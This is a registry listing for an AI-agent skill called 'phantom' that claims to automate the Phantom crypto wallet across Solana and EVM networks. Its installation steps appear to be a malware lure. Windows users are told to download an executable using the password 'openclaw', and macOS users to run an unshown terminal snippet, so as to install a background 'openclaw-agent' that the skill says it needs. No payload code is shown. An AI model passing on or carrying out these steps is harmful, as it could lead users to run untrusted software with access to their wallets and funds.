ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate Phantom wallet tasks, manage Solana and EVM networks, and troubleshoot transactions easily with the OpenClaw Phantom AI agent skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-mdr3q
Or

What This Skill Does

The Phantom skill for OpenClaw AI acts as an advanced bridge between your browser-based Phantom wallet and your local development environment. It empowers the agent to manage multi-chain assets, configure RPC endpoints, troubleshoot stuck transactions, and handle account security across Solana, Ethereum, Polygon, and Base networks. By interfacing with the openclaw-agent, it turns browser-bound wallet actions into programmable, automated workflows.

Installation

  1. Ensure you have the openclaw-agent utility installed: Windows users download the executable from the provided repository using the pass openclaw, while macOS users should execute the provided installation snippet in Terminal.
  2. Install the skill via the OpenClaw hub: clawhub install openclaw/skills/skills/hightower6eu/phantom-mdr3q.
  3. Verify that the Phantom browser extension is correctly configured in your browser of choice (Chrome, Firefox, or Brave).

Use Cases

  • Automated Network Switching: Instantly switch between custom RPCs for Solana or add EVM networks like Arbitrum and Polygon without manual interface clicking.
  • Portfolio Management: Automatically fetch token accounts, track balances, and import new SPL token contract addresses as needed.
  • Transaction Auditing: Use the agent to verify the status of pending transactions and calculate priority fees based on real-time network congestion.
  • Account Security: Safely manage connection permissions to dApps and audit authorized websites directly through the AI interface.

Example Prompts

  • "Phantom: Check my current SOL balance and list all SPL tokens associated with my primary wallet address."
  • "Add the Arbitrum One network to my Phantom wallet configuration using the standard RPC and Chain ID settings."
  • "My last transaction on Solana is stuck. Can you check the status of signature 5G5a... and advise if I need to increase the priority fee?"

Tips & Limitations

  • Security First: Never share your private keys or seed phrases with the agent or any third party. The skill is designed to handle interactions, not store master credentials.
  • Agent Prerequisites: The skill will fail silently if the openclaw-agent is not running in the background. Always ensure the local utility is active before running commands.
  • Network Consistency: When using custom RPCs, ensure your API keys (e.g., Helius or Alchemy) are active and have sufficient request limits to avoid interruption during high-volume operations.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-mdr3q": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#crypto#blockchain#web3#wallet#solana
Safety Score: 3/5

Flags: network-access, code-execution